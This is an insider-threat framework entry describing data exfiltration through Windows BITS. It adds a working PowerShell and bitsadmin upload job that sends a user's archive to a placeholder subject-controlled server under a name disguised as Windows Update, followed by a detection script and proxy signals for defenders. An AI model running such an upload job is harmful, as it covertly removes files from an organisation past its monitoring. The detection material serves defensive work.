Insider Threat Matrix™
  • ID: IF004.007
  • Created: 6th April 2026
  • Updated: 6th April 2026
  • Contributor: The ITM Team

Exfiltration via Windows BITS

A subject may leverage the Windows Background Intelligent Transfer Service (BITS) to exfiltrate organizational data in a covert and resilient manner. BITS is a native Windows service that transfers files asynchronously over HTTP, HTTPS or SMB; Windows Update and other system components use it to fetch patches and content in the background. Because it runs as a trusted system service, throttles itself to idle bandwidth, and keeps its job queue across reboots, it is an attractive mechanism for stealthy data exfiltration.

In this infringement method, the subject creates or modifies a BITS job, either via native utilities (bitsadmin.exe, the BitsTransfer PowerShell cmdlets) or custom tooling that calls the BITS COM API, to upload sensitive files to an endpoint under their control. A BITS upload does not use a plain HTTP PUT or POST; it uses the BITS upload protocol, so the receiving endpoint must be IIS with the BITS Server Extensions or a custom server that implements that protocol. Once that is in place, the transfers are sent by the BITS service itself over standard ports and protocols, and blend with ordinary background system traffic.

BITS jobs persist across reboots, retry failed transfers on a configurable schedule (by default every 10 minutes for up to 14 days), and run without user interaction, allowing the subject to stage data and exfiltrate it gradually over an extended period. The subject may combine BITS with obfuscation, such as renaming payloads, archiving or encrypting data before transfer, or hosting the receiving endpoint on subject-controlled infrastructure that mimics a legitimate service.
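The following is an added example, not code from the Insider Threat Matrix page, showing what the upload job described above looks like when built with the BitsTransfer module. The local path, destination URL and job name are placeholders. It assumes the destination runs IIS with the BITS Server Extensions or a custom server speaking the BITS upload protocol; a plain web server that only accepts PUT or POST will reject the job.

```powershell
# Added example: a background, low-priority BITS upload job with explicit retry settings.
# Paths, URL and display name are placeholders, not values from the ITM page.
Import-Module BitsTransfer

$Source      = 'C:\Users\alice\Documents\project-archive.zip'         # placeholder local file
$Destination = 'https://files.example.net/bits/project-archive.zip'   # placeholder subject-controlled endpoint

$params = @{
    Source        = $Source
    Destination   = $Destination
    TransferType  = 'Upload'       # Upload, not the default Download; requires a BITS-capable server
    Asynchronous  = $true          # return a job object; the BITS service carries on without the caller
    Priority      = 'Low'          # background priority: BITS throttles the job to idle bandwidth
    RetryInterval = 600            # retry a failed transfer every 10 minutes (the default) ...
    RetryTimeout  = 1209600        # ... for up to 14 days (the default) before the job errors out
    DisplayName   = 'Windows Update Cache Sync'   # placeholder name chosen to blend with legitimate jobs
}
$job = Start-BitsTransfer @params

# The job persists in the BITS queue across reboots; these are the fields a hunter later
# sees with Get-BitsTransfer -AllUsers.
$job | Select-Object JobId, DisplayName, TransferType, JobState, Priority, OwnerAccount, CreationTime
$job.FileList | Select-Object LocalName, RemoteName, BytesTransferred, BytesTotal

# Equivalent with the deprecated but still present bitsadmin.exe:
#   bitsadmin /create /upload "Windows Update Cache Sync"
#   bitsadmin /addfile "Windows Update Cache Sync" https://files.example.net/bits/project-archive.zip C:\Users\alice\Documents\project-archive.zip
#   bitsadmin /setpriority "Windows Update Cache Sync" LOW
#   bitsadmin /resume "Windows Update Cache Sync"
```

The job needs no elevated rights, and the upload continues after the PowerShell session closes because the transfer is performed by the BITS service, not by the caller's process.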

This technique is particularly effective in environments where outbound HTTP(S) traffic is loosely controlled and where native Windows services are implicitly trusted by egress filtering and endpoint tooling, reducing the likelihood of immediate detection.

Examples of Use

  • A subject creates a BITS upload job using PowerShell to send archived project files to an external web server on a personal VPS that accepts BITS uploads.
  • A subject uses a scheduled task or script to create low-priority BITS jobs that periodically send newly collected documents to a remote endpoint, keeping bandwidth low to avoid volume-based alerts.
  • A subject modifies an existing BITS job to add file uploads to a subject-controlled domain, blending the activity with legitimate system update traffic.
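The hunting script below is an added example, not part of the Insider Threat Matrix page. It surfaces the artifacts the scenarios above leave behind on a host: live jobs in the BITS queue (Get-BitsTransfer -AllUsers) and finished or cancelled jobs recorded in the Microsoft-Windows-Bits-Client/Operational log (Event ID 3 for job creation, 59 and 60 for a transfer starting and stopping against a URL). The allow list of hosts is a hypothetical placeholder, and the event data field names are those used by the Bits-Client log as the author of this example knows them, with a regex over the event message as a fallback.

```powershell
# Added hunting script, not from the ITM page. Run elevated: Get-BitsTransfer -AllUsers and the
# Bits-Client operational log both require Administrator rights.
Import-Module BitsTransfer

$AllowedHosts = @('windowsupdate.com', 'microsoft.com', 'windows.com')   # hypothetical allow list
$LookbackDays = 7

function Test-AllowedHost {
    param([string]$Url)
    $uri = $null
    if (-not [System.Uri]::TryCreate($Url, [System.UriKind]::Absolute, [ref]$uri)) { return $false }
    foreach ($allowed in $AllowedHosts) {
        if ($uri.Host -eq $allowed -or $uri.Host.EndsWith(".$allowed")) { return $true }
    }
    return $false
}

# 1. Live jobs in the BITS queue. Upload and UploadReply jobs are rare on a workstation, and any
#    remote name outside the allow list is worth a look regardless of direction.
function Get-SuspiciousBitsJob {
    foreach ($job in (Get-BitsTransfer -AllUsers -ErrorAction SilentlyContinue)) {
        foreach ($file in $job.FileList) {
            $isUpload  = $job.TransferType -ne 'Download'
            $isUnknown = -not (Test-AllowedHost $file.RemoteName)
            if ($isUpload -or $isUnknown) {
                [pscustomobject]@{
                    Source      = 'LiveJob'
                    Owner       = $job.OwnerAccount
                    Job         = $job.DisplayName
                    Type        = $job.TransferType
                    State       = $job.JobState
                    Priority    = $job.Priority
                    Created     = $job.CreationTime
                    LocalName   = $file.LocalName
                    RemoteName  = $file.RemoteName
                    Transferred = "$($file.BytesTransferred)/$($file.BytesTotal)"
                    NotifyCmd   = $job.NotifyCmdLine   # a job that runs a command on completion is a second red flag
                }
            }
        }
    }
}

# 2. Completed or cancelled jobs are gone from the queue but remain in the operational log.
#    ID 3 records the creator (title, owner, process); 59/60 record the URL per transfer.
function Get-SuspiciousBitsEvent {
    $filter = @{
        LogName   = 'Microsoft-Windows-Bits-Client/Operational'
        Id        = 3, 59, 60
        StartTime = (Get-Date).AddDays(-$LookbackDays)
    }
    $events  = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    $creator = @{}   # job title -> "owner via process" taken from ID 3
    $parsed  = foreach ($e in $events) {
        $data = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($e.Id -eq 3) {
            if ($data['jobTitle']) { $creator[$data['jobTitle']] = "$($data['jobOwner']) via $($data['processPath'])" }
            continue
        }
        $url = $data['url']
        if (-not $url -and $e.Message -match 'associated with the (\S+) URL') { $url = $Matches[1] }
        [pscustomobject]@{ Time = $e.TimeCreated; Id = $e.Id; Job = $data['name']; Url = $url }
    }
    foreach ($p in $parsed) {
        if ($p.Url -and -not (Test-AllowedHost $p.Url)) {
            $by = if ($p.Job -and $creator.ContainsKey($p.Job)) { $creator[$p.Job] } else { $null }
            [pscustomobject]@{
                Source     = 'EventLog'
                Time       = $p.Time
                EventId    = $p.Id
                Job        = $p.Job
                RemoteName = $p.Url
                CreatedBy  = $by
            }
        }
    }
}

Get-SuspiciousBitsJob   | Format-Table -AutoSize
Get-SuspiciousBitsEvent | Sort-Object Time | Format-Table -AutoSize
```

On the network side the upload protocol is itself a signal: BITS upload requests use the HTTP method BITS_POST and carry a BITS-Packet-Type header, and the service identifies itself with a User-Agent of the form Microsoft BITS/<version>, so a proxy rule that alerts on BITS_POST to hosts outside the update allow list catches the transfer even where the host-side artifacts have been cleaned up.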